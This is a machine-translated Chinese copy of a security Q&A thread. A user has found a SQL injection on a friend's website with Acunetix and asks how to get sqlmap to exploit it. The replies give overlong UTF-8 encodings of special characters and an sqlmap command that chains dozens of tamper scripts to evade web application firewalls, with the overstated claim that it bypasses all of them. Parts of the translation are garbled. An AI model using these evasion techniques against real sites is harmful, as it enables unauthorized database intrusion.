我现在在我朋友的网站上。我找到了一个带有acunetix帮助的SQL注入:
- URL encoded GET input for was set to 1#####
Error message found:
supplied argument is not a valid MySQL result所以我试着运行一个普通sqlmap:
./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25输出:
11:16:31 URI参数'#1*‘不是可注入的11:16:31,所有测试的参数似乎都是不可注入的。尝试增加‘-级别’/‘-风险’值来执行更多的测试。另外,您可以尝试通过为选项'--string‘(或'--regexp')提供一个有效值来重新运行。如果你怀疑涉及某种保护机制(例如WAF),也许你可以用一个选项‘--篡改’(例如‘--tamper=space2注释’)进行重试。
所以,我需要一个方法来包括那些#'s,(for=1%00%c0%a7%c0%a2)尝试了--string和--suffix,但没有做这个工作。也许这是一个篡改?
发布于 2017-01-05 01:13:34
这些性状是超长的:‘%27 = %c0%a7 = %e0%80%a7 =%f0%80%A7“= %22 = %c0%a2 = %e0%80%a2 = %f0%80%80%a2 <= %3c = %c0%bc = %e0%80%bc =%f0%80%bc=%f0%80%bc;= %3b = %c0%bb = %e0%80%bb = %f0%80%80%bb & %26 = %c0%a6 = %e0%80%a6 =%f0%80%a6 \0= % 00 = %c0%80 %80%80%80%80% %f0%80%80%80 %80%
如果使用SQLMAP,则可以使用-tamper=overlongutf8 8攻击该漏洞。
发布于 2017-02-22 16:02:52
还有一种方法可以在一行中使用所有的管理员,如下所示:
./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords通过使用这个,您可以传递所有的WAF。
https://security.stackexchange.com/questions/135858
复制相似问题